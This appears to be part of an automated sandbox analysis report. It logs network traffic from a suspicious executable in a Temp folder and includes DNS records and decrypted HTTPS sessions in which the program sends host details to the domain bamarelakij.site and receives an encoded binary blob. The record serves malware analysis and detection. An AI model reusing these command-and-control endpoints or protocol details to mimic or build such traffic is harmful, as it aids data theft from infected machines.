                                                                                                                                                                Jan 9, 2025 14:42:53.890233994 CET56226443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:53.890566111 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:53.890995979 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:53.891587019 CET44361689172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:53.891846895 CET61689443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.043574095 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.043726921 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.044348955 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.044523954 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.371579885 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.539642096 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.539668083 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.539689064 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.539695024 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.539696932 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.540467978 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.540559053 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.540663004 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.540663004 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.634254932 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.634350061 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.634865999 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:34.730176926 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.731008053 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.731514931 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:34.731671095 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:36.122139931 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:36.122240067 CET55481443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:43:36.216937065 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:36.218000889 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:36.218034983 CET44355481172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:43:36.218672991 CET55481443192.168.2.7172.64.41.3

                                                                                                                                                                ICMP Packets

                                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                Jan 9, 2025 14:42:35.025966883 CET192.168.2.71.1.1.1c2a3(Port unreachable)Destination Unreachable

                                                                                                                                                                DNS Queries

                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                Jan 9, 2025 14:42:21.057095051 CET192.168.2.71.1.1.10xf30Standard query (0)bamarelakij.siteA (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:31.491338015 CET192.168.2.71.1.1.10x9dc2Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:31.491509914 CET192.168.2.71.1.1.10x5227Standard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:32.696388960 CET192.168.2.71.1.1.10x9e10Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:32.696909904 CET192.168.2.71.1.1.10xeb94Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.598686934 CET192.168.2.71.1.1.10x6ae4Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.598921061 CET192.168.2.71.1.1.10x51a1Standard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.610166073 CET192.168.2.71.1.1.10xa52Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.610323906 CET192.168.2.71.1.1.10x44e7Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.619101048 CET192.168.2.71.1.1.10xbeaStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.619242907 CET192.168.2.71.1.1.10xe0aStandard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.630526066 CET192.168.2.71.1.1.10x4f8aStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.630708933 CET192.168.2.71.1.1.10x61b8Standard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:35.766357899 CET192.168.2.71.1.1.10xba68Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:35.766936064 CET192.168.2.71.1.1.10x9cfStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:35.768549919 CET192.168.2.71.1.1.10x6e0bStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:35.769061089 CET192.168.2.71.1.1.10xcb1aStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:35.775172949 CET192.168.2.71.1.1.10xba2bStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:35.775321007 CET192.168.2.71.1.1.10xafc5Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                DNS Answers

                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                Jan 9, 2025 14:42:21.071046114 CET1.1.1.1192.168.2.70xf30No error (0)bamarelakij.site104.21.80.52A (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:21.071046114 CET1.1.1.1192.168.2.70xf30No error (0)bamarelakij.site172.67.174.91A (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:31.498169899 CET1.1.1.1192.168.2.70x5227No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:31.498200893 CET1.1.1.1192.168.2.70x9dc2No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:31.592683077 CET1.1.1.1192.168.2.70xff15No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:31.592683077 CET1.1.1.1192.168.2.70xff15No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:31.593121052 CET1.1.1.1192.168.2.70x4a77No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:32.703454018 CET1.1.1.1192.168.2.70x9e10No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:32.703622103 CET1.1.1.1192.168.2.70xeb94No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.605789900 CET1.1.1.1192.168.2.70x6ae4No error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.605789900 CET1.1.1.1192.168.2.70x6ae4No error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.605789900 CET1.1.1.1192.168.2.70x6ae4No error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.605789900 CET1.1.1.1192.168.2.70x6ae4No error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.617033958 CET1.1.1.1192.168.2.70xa52No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.617542028 CET1.1.1.1192.168.2.70x44e7No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.625972986 CET1.1.1.1192.168.2.70xe0aNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.626007080 CET1.1.1.1192.168.2.70xbeaNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.637319088 CET1.1.1.1192.168.2.70x4f8aNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:33.637399912 CET1.1.1.1192.168.2.70x61b8No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:35.773019075 CET1.1.1.1192.168.2.70xba68No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:35.773019075 CET1.1.1.1192.168.2.70xba68No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:35.773865938 CET1.1.1.1192.168.2.70x9cfNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:35.775511980 CET1.1.1.1192.168.2.70x6e0bNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:35.775511980 CET1.1.1.1192.168.2.70x6e0bNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:35.775551081 CET1.1.1.1192.168.2.70xcb1aNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:35.782345057 CET1.1.1.1192.168.2.70xba2bNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:35.782345057 CET1.1.1.1192.168.2.70xba2bNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                Jan 9, 2025 14:42:35.783341885 CET1.1.1.1192.168.2.70xafc5No error (0)chrome.cloudflare-dns.com65IN (0x0001)false

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • bamarelakij.site
                                                                                                                                                                • chrome.cloudflare-dns.com
                                                                                                                                                                • https:
                                                                                                                                                                  • c.msn.com
                                                                                                                                                                  • sb.scorecardresearch.com
                                                                                                                                                                  • browser.events.data.msn.com
                                                                                                                                                                • clients2.googleusercontent.com

                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                0192.168.2.749973104.21.80.524436224C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:21 UTC354OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                Content-Length: 147
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:42:21 UTC147OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 00 00 00 00 00 60 00 00 00 fe ff ff ff 00 00 00 00 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 4e 2d f0 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzdN-$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                                                                                2025-01-09 13:42:22 UTC831INHTTP/1.1 200 OK
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:22 GMT
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                pid: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=svpFeyrP8wDVviJpdoarUP64DfvDewVjAKU0SKeM9G8ByHXFj%2B%2BbBsT48xR6uG5hNP4puGZwndf%2FpUfOWjmI4BLV3eFxonMsR5Tse63m7mPZoO%2FsHwTIKVvvE41lFEhQ9YqV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4d9a20f117c9c-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1766&rtt_var=685&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1137&delivery_rate=1572428&cwnd=252&unsent_bytes=0&cid=b840c12094c3e232&ts=694&x=0"
                                                                                                                                                                2025-01-09 13:42:22 UTC17INData Raw: 63 0d 0a 00 00 00 00 1c 8a 00 00 f5 54 29 07 0d 0a
                                                                                                                                                                Data Ascii: cT)
                                                                                                                                                                2025-01-09 13:42:22 UTC1369INData Raw: 33 37 63 33 0d 0a 00 00 00 00 56 03 d4 02 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 4c d4 02 4e d4 89 08 0a 5c fb d8 5a 90 45 5b 4e d7 d0 6c 1d 03 f5 0b 15 00 08 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 f5 0b 57 06 36 49 41 a7 98 95 e0 e4 de cc d2 d8 ca e6 0d 03 09 0d 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 09 0d fd 57 7f 48 6c 7c b9 b1 17 ec 4c e4 d7 08 6d fa 67 0c 3b 02 15 00 0f 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 3b 02 57 06 36 49 41 a7 98 95 9c ca e8 ee de e4 d6 b8 86 de de d6 d2 ca e6 fb 06 90 02 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 31 90 02 48 34 d6 d3 2a f9 e3 d9 a7 07 a0 09 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 a0 09 ea 76 df 2c 89 bf ea 26 01 0b a2 0a 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 a2 0a 1f 81 c5 a8 bc 19 f4 a3 f4 3a f6
                                                                                                                                                                Data Ascii: 37c3VlLN\ZE[NllW6IAlWHl|Lmg;l;W6IAl1H4*lv,&l:
                                                                                                                                                                2025-01-09 13:42:22 UTC1369INData Raw: 36 49 41 a7 98 95 e6 ca c6 da de c8 5c c8 c4 11 0b 98 06 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 98 06 fa 9a f0 97 98 b2 30 98 cc 02 02 0e 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 02 0e da 30 e2 10 b8 f9 d7 1a 35 08 34 0a 15 00 1d 00 08 1f 0f 17 15 04 d9 6c 08 d9 b1 34 0a 57 06 36 49 41 a7 98 95 c8 d2 e6 c6 de e4 c8 b8 98 de c6 c2 d8 40 a6 e8 de e4 c2 ce ca b8 d8 ca ec ca d8 c8 c4 06 08 5b 00 15 00 01 00 08 1f 0f 17 15 04 d9 6c 08 d9 12 5b 00 57 06 36 49 41 a7 98 95 54 56 05 3b 0a 15 00 01 00 08 1f 0f 17 15 04 d9 6c 08 d9 0b 3b 0a 57 06 36 49 41 a7 98 95 00 50 02 23 08 15 00 11 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 23 08 57 06 36 49 41 a7 98 95 9a d2 c6 e4 de e6 de cc e8 b8 9e ea e8 d8 de de d6 20 00 a8 08 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd
                                                                                                                                                                Data Ascii: 6IA\l0l054l4W6IA@[l[W6IATV;l;W6IAP#l#W6IA l
                                                                                                                                                                2025-01-09 13:42:22 UTC1369INData Raw: dc ac a0 9c b6 0a b8 04 15 00 1c 00 08 1f 0f 17 15 04 d9 6c 08 d9 12 b8 04 57 06 36 49 41 a7 98 95 c2 e8 de da d2 c6 b8 98 de c6 c2 d8 40 a6 e8 de e4 c2 ce ca b8 d8 ca ec ca d8 c8 c4 bd 0c d2 0a 15 00 11 00 08 1f 0f 17 15 04 d9 6c 08 d9 4c d2 0a 57 06 36 49 41 a7 98 95 44 ca dc c6 e4 f2 e0 e8 ca c8 be d6 ca f2 44 74 44 58 0e e4 08 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 e4 08 74 a8 ff 53 24 61 ca 59 9f 07 a9 0d 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 a9 0d f3 13 76 8f 90 da 43 85 46 0b 90 0a 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 12 90 0a 55 e6 71 be ae 93 9a 88 be 5d 42 12 15 e7 4e c3 b8 06 ac 0b 15 00 07 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 ac 0b 57 06 36 49 41 a7 98 95 9e ea e8 d8 de de d6 8d 00 3a 0b 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04
                                                                                                                                                                Data Ascii: lW6IA@lLW6IADDtDXltS$aYlvCFlUq]BNlW6IA:l
                                                                                                                                                                2025-01-09 13:42:22 UTC1369INData Raw: 17 15 04 c9 6c 04 c9 b8 48 0b 47 71 56 f0 25 59 96 ff 53 00 c5 01 15 00 11 00 08 1f 0f 17 15 04 d9 6c 08 d9 f9 c5 01 57 06 36 49 41 a7 98 95 a6 9e 8c a8 ae 82 a4 8a b8 a8 d2 ce ca e4 ac 9c 86 01 00 2c 00 15 00 07 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 2c 00 57 06 36 49 41 a7 98 95 86 aa a4 a4 8a 9c a8 d1 08 e9 04 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 e9 04 82 87 32 05 e1 4e 07 0f 2c 0e 12 0f 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 12 0f 39 2a b2 22 5b e3 87 28 d3 0b a2 0e 15 00 07 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 a2 0e 57 06 36 49 41 a7 98 95 86 de de d6 d2 ca e6 af 03 e9 0e 15 00 12 00 08 1f 0f 17 15 04 d9 6c 08 d9 10 e9 0e 57 06 36 49 41 a7 98 95 cc de e4 da d0 d2 e6 e8 de e4 f2 5c e6 e2 d8 d2 e8 ca ed 08 a4 0d 15 00 08 00 08 1f 0f 17 15 04
                                                                                                                                                                Data Ascii: lHGqV%YSlW6IA,l,W6IAl2N,l9*"[(lW6IAlW6IA\
                                                                                                                                                                2025-01-09 13:42:22 UTC1369INData Raw: c8 ce ca 5c ca f0 ca 28 03 13 09 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 0b 13 09 90 1a 8e 10 93 a1 e9 4e 7a a1 bd bc 28 d5 3d 05 9d 01 2b 05 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 b1 2b 05 c1 d2 5d 0e a3 1b 68 04 55 08 0d 0f 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 b8 0d 0f de b4 9a 63 b8 7d af 69 4f 0b 51 0f 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd b8 51 0f 8e 2c b9 76 bf 66 da b8 01 97 8a da 04 12 0e f3 1b 0f 3f 04 15 00 15 00 08 1f 0f 17 15 04 d9 6c 08 d9 f9 3f 04 57 06 36 49 41 a7 98 95 aa d8 e8 e4 c2 ac 9c 86 b8 ea d8 e8 e4 c2 ec dc c6 5c d2 dc d2 1b 07 22 00 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 4c 22 00 88 8c 51 20 82 b3 ae 26 58 02 dd 09 15 00 25 00 08 1f 0f 17 15 04 d9 6c 08 d9 48 dd 09 57 06 36 49 41 a7 98 95 cc e8 e0 b8 ae d2 dc a6
                                                                                                                                                                Data Ascii: \(lNz(=+l+]hUlc}iOQlQ,vf?l?W6IA\"lL"Q &X%lHW6IA
                                                                                                                                                                2025-01-09 13:42:22 UTC1369INData Raw: c9 12 fd 01 ed dd 14 dd 8f f5 d4 d2 bb 03 d3 04 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 d3 04 66 c3 c8 8d 05 0a fd 87 91 08 e0 03 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 f9 e0 03 8b 9b 77 43 e8 52 42 49 ce 0a 41 04 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd d8 41 04 ab 3b 9f 71 44 8a ad 27 24 80 ac dd ff fe 79 6c 84 05 73 06 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 73 06 6e 68 98 7e 0d a1 ad 74 2f 06 6d 03 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd b8 6d 03 a3 25 be e4 09 f7 b9 f4 48 9e 8d 48 b2 83 6d bf 6c 05 8c 03 15 00 04 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 8c 03 57 06 36 49 41 a7 98 95 98 9e 86 96 b6 07 2f 09 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 2f 09 93 2e 93 85 52 c9 02 e0 79 95 a0 29 e9 bd d6 ab 42 0b e7 02 15 00 08 00 08 1f 0f 17
                                                                                                                                                                Data Ascii: lflwCRBIAlA;qD'$ylslsnh~t/mlm%HHmllW6IA/l/.Ry)B
                                                                                                                                                                2025-01-09 13:42:22 UTC1369INData Raw: 2e c2 65 cb 4d 0b 50 c1 af 0a 87 0e 15 00 01 00 08 1f 0f 17 15 04 d9 6c 08 d9 12 87 0e 57 06 36 49 41 a7 98 95 54 eb 0b ff 01 15 00 2d 00 08 1f 0f 17 15 04 d9 6c 08 d9 48 ff 01 57 06 36 49 41 a7 98 95 cc e8 e0 b8 ae d2 dc a6 86 a0 b8 92 dc d2 be 8c d2 d8 ca e6 b8 d8 de c6 c2 d8 82 e0 e0 88 c2 e8 c2 a0 e4 de ce e4 c2 da e6 5c d2 dc d2 68 06 8d 09 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 8d 09 93 20 7d 30 f1 08 bd 3f 4c 03 b6 0b 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 4c b6 0b 5c 2d 31 21 fe ac 26 0e 79 02 c4 00 15 00 1b 00 08 1f 0f 17 15 04 d9 6c 08 d9 12 c4 00 57 06 36 49 41 a7 98 95 ee c2 d8 d8 ca e8 e6 b8 84 d2 e8 c6 de d2 dc 86 de e4 ca b8 ee c2 d8 d8 ca e8 e6 3a 08 ee 08 15 00 08 00 08 1f 0f 17 15 04 d9 6c 08 d9 48 ee 08 57 06 36 49 41 a7 98 95
                                                                                                                                                                Data Ascii: .eMPlW6IAT-lHW6IA\hl }0?LlL\-1!&ylW6IA:lHW6IA
                                                                                                                                                                2025-01-09 13:42:22 UTC1369INData Raw: 04 c9 6c 04 c9 d8 6c 0f 42 9b ba 7b 25 52 8f 71 0f 04 2d 06 15 00 17 00 08 1f 0f 17 15 04 d9 6c 08 d9 12 2d 06 57 06 36 49 41 a7 98 95 ee c2 d8 d8 ca e8 e6 b8 86 de d2 dc de da d2 b8 ee c2 d8 d8 ca e8 e6 6f 0e 8d 02 15 00 07 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 8d 02 57 06 36 49 41 a7 98 95 86 de de d6 d2 ca e6 e3 04 82 05 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 82 05 cc 3f a5 88 ae f6 90 82 36 0a 48 0a 15 00 1d 00 08 1f 0f 17 15 04 d9 6c 08 d9 b1 48 0a 57 06 36 49 41 a7 98 95 da ca e6 e6 ca dc ce ca e4 e6 b8 88 d2 e6 c6 de e4 c8 b8 a6 e8 c2 c4 d8 ca b8 d6 ca f2 b5 09 3a 00 15 00 05 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 3a 00 57 06 36 49 41 a7 98 95 54 5c d2 dc d2 58 01 07 0c 15 00 58 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 07 0c 57 06 36 49 41 a7 98 95 a6
                                                                                                                                                                Data Ascii: llB{%Rq-l-W6IAolW6IAl?6HlHW6IA:l:W6IAT\XXlW6IA


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                1192.168.2.749974104.21.80.524436224C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2025-01-09 13:42:22 UTC434OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Accept: */*
                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
                                                                                                                                                                Content-Length: 53
                                                                                                                                                                Host: bamarelakij.site
                                                                                                                                                                2025-01-09 13:42:22 UTC53OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 03 00 00 00 00 02 00 00 00 fe ff ff ff 00 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                Data Ascii:
                                                                                                                                                                2025-01-09 13:42:23 UTC754INHTTP/1.1 200 OK
                                                                                                                                                                Date: Thu, 09 Jan 2025 13:42:23 GMT
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1p3C%2FxXMtcyW8frsPQkMtT8NjfISDjo%2FtJpe9XJzVjlBm6KLB%2FvNJPZFvB65St3dI43%2B%2BKvSKMdS4HfpP9i7B47cv5wbxcoI59K5ntR7Avl%2BrcF0ApLD9Vn85CmBB6%2BYrLH3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8ff4d9aa18af7274-EWR
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1819&min_rtt=1818&rtt_var=685&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1123&delivery_rate=1593886&cwnd=182&unsent_bytes=0&cid=a0bf643277919200&ts=312&x=0"
